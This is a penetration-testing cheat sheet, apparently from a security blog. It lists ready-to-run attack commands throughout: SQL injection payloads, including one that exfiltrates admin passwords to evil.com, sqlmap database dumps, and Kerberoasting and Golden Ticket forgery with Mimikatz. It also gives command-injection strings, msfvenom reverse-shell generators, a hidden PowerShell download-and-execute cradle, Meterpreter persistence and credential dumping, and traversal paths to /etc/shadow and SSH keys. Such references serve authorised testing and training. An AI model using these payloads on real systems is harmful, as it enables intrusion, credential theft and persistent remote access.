Exploitation Cheat Sheet

Exploitation
ToxSec

Exploitation Cheat Sheet

This page serves as a cheat sheet for quickly launching commands for identified vulnerabilities. Use it as a reference guide or for syntax help.

SQL Injection

Manual SQLi

Error-Based

# Generic
' OR '1'='1
'--
'#
'-- -


# Login Forms
admin'--
admin'-- -

Boolean-Based Blind

True: 
' AND '1'='1
False: 
' AND '1'='2# 

' AND 1=1--
' OR 1=1--
' OR 'a'='a
' OR 1=1; --

Time-Based Blind

' OR IF('1'='1', sleep(5), 0)--

UNION-Based

' UNION SELECT NULL, username, password FROM users--

Out-of-Band Exfiltration

' UNION SELECT LOAD_FILE(CONCAT('\\\\', (SELECT password FROM users WHERE username='admin'), '.evil.com\\'))--

SQLMap Commands

Basic Scan

sqlmap -u "http://example.com/page.php?id=1"

List Databases

sqlmap -u "http://example.com/page.php?id=1" --dbs

Dump Tables

sqlmap -u "http://example.com/page.php?id=1" -D target_db --tables
sqlmap -u "http://example.com/page.php?id=1" -D target_db -T users --dump

Bypass WAF

sqlmap -u "http://example.com/page.php?id=1" --tamper=space2comment

Captured Request

sqlmap -r request.txt

Kerberoasting

Enumerate SPNs:

This is your first step. Identify potential service accounts:

# PowerView's way of listing SPNs
Import-Module .\PowerView.ps1
Get-NetUser | Where-Object { $_.serviceprincipalname }

Extract Service Tickets:

# Using Invoke-Kerberoast to get the tickets
Invoke-Kerberoast -OutputFormat Hashcat | Format-List

This will yield ticket hashes, ripe for cracking.

Cracking the Tickets:

Armed with the ticket hashes, it’s time to bring Hashcat into play:

# Hashcat at work on the Kerberos tickets
hashcat -m 13100 -a 0 ticket_hashes.txt path_to_wordlist/wordlist.txt

The -m 13100 specifies the hash type (Kerberos TGS-REP etype 23) while -a 0 denotes a straight attack mode. Should you have rules for mutating potential passwords, integrate them for more advanced cracking attempts.

Golden Ticket Attack

Extracting the krbtgt Hash:

With domain administrator privileges, the next move is to extract the krbtgt hash:

# Mimikatz command for fetching the krbtgt hash
lsadump::lsa /inject /name:krbtgt

Create the Ticket:

With the krbtgt hash in hand, it’s time to forge the Golden Ticket:

# Mimikatz command to generate a Golden Ticket
kerberos::golden /user:Administrator /domain:target_domain.local /sid:S-1-5-21-XXXXX /krbtgt:krbtgt_hash_here /ticket:golden_ticket.tkt

Use the Ticket:

Once you’ve created the Golden Ticket, it needs to be loaded into your session:

# Mimikatz to load the Golden Ticket
kerberos::ptt golden_ticket.tkt

From here, you can access resources, execute commands, or perform other actions as if you were an authenticated domain user.

Pass the Ticket Attack

Inject the Ticket

With a ticket in hand (often a .kirbi file), it’s time to inject it into your session:

# Using Mimikatz to inject the ticket
kerberos::ptt ticket_name.kirbi

Access Resources:

After injection, you can access resources as the user associated with the ticket:

# Accessing a file share, for example
net use \\target_machine\share

Command Injection

# Chain Command
<input>; whoami

# &&
<input> && whoami

# ||
<input> || whoami

# Input redirection
<input> < /etc/passwd

# Command Substitution
<input> $(ls)
<input> `ls`

# Nesting Commands
<input>; echo $(ls)

# Inline Comments
<input>; whoami # 

# Using Pipe
<input> | whoami

Meterpreter

Sessions

CTRL+Z   -> Session in Background
sessions -> List sessions
sessions -i session_number -> Interact with Session with id
sessions -u session_number -> Upgrade session to a meterpreter
sessions -u session_number LPORT=4444 PAYLOAD_OVERRIDE=meterpreter/reverse_tcp HANDLER=false-> Upgrade session to a meterpreter

sessions -c cmd           -> Execute a command on several sessions
sessions -i 10-20 -c "id" -> Execute a command on several sessions

Background handler

ExitOnSession : the handler will not exit if the meterpreter dies.

screen -dRR
sudo msfconsole

use exploit/multi/handler
set PAYLOAD generic/shell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false

generate -o /tmp/meterpreter.exe -f exe
to_handler

[ctrl+a] + [d]

Generate a meterpreter

$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f elf > shell.elf
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f exe > shell.exe
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f macho > shell.macho
$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f asp > shell.asp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.jsp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f war > shell.war
$ msfvenom -p cmd/unix/reverse_python LHOST="10.10.10.110" LPORT=4242 -f raw > shell.py
$ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > shell.sh
$ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl

Meterpreter Webdelivery

Set up a Powershell web delivery listening on port 8080.

use exploit/multi/script/web_delivery
set TARGET 2
set payload windows/x64/meterpreter/reverse_http
set LHOST 10.0.0.1
set LPORT 4444
run
powershell.exe -nop -w hidden -c $g=new-object net.webclient;$g.proxy=[Net.WebRequest]::GetSystemWebProxy();$g.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $g.downloadstring('http://10.0.0.1:8080/rYDPPB');

Get System

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Persistence Startup

OPTIONS:

-A        Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
-P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
-S        Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt>  Alternate executable template to use
-U        Automatically start the agent when the User logs on
-X        Automatically start the agent when the system boots
-h        This help menu
-i <opt>  The interval in seconds between each connection attempt
-p <opt>  The port on which the system running Metasploit is listening
-r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter > run persistence -U -p 4242

Network Monitoring

# list interfaces
run packetrecorder -li

# record interface n°1
run packetrecorder -i 1

Portforward

portfwd add -l 7777 -r 172.17.0.2 -p 3006

Upload / Download

upload /path/in/hdd/payload.exe exploit.exe
download /path/in/victim

Execute from Memory

execute -H -i -c -m -d calc.exe -f /root/wce.exe -a  -w

Mimikatz

load mimikatz
mimikatz_command -f version
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::wdigest
mimikatz_command -f sekurlsa::searchPasswords
mimikatz_command -f sekurlsa::logonPasswords full
load kiwi
creds_all
golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>

Directory Traversal

Basic Form

# Basic
http://example.com/viewfile?file=../../../etc/passwd

# Encoded
http://vulnerable-site.com/view?file=%2E%2E%2F%2E%2E%2Fetc%2Fpasswd

# Double Encoded
http://vulnerable-site.com/view?file=%252E%252E%252F%252E%252E%252Fetc%252Fpasswd

Always Check

# Linux
/<user>/home/.ssh/id_rsa
/etc/ssl/private/
/var/lib/mysql/
/etc/sudoers
/etc/passwd
/etc/shadow
/etc/ssh/
/var/log/
/var/www/

# Windows
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\inetsrv\config
C:\ProgramData\Microsoft\Crypto
C:\Windows\System32\LogFiles
C:\Windows\System32\config
C:\Windows\System32\inetsrv
C:\inetpub\wwwroot
C:\Inetpub
C:\Users

Related Posts

Back To Top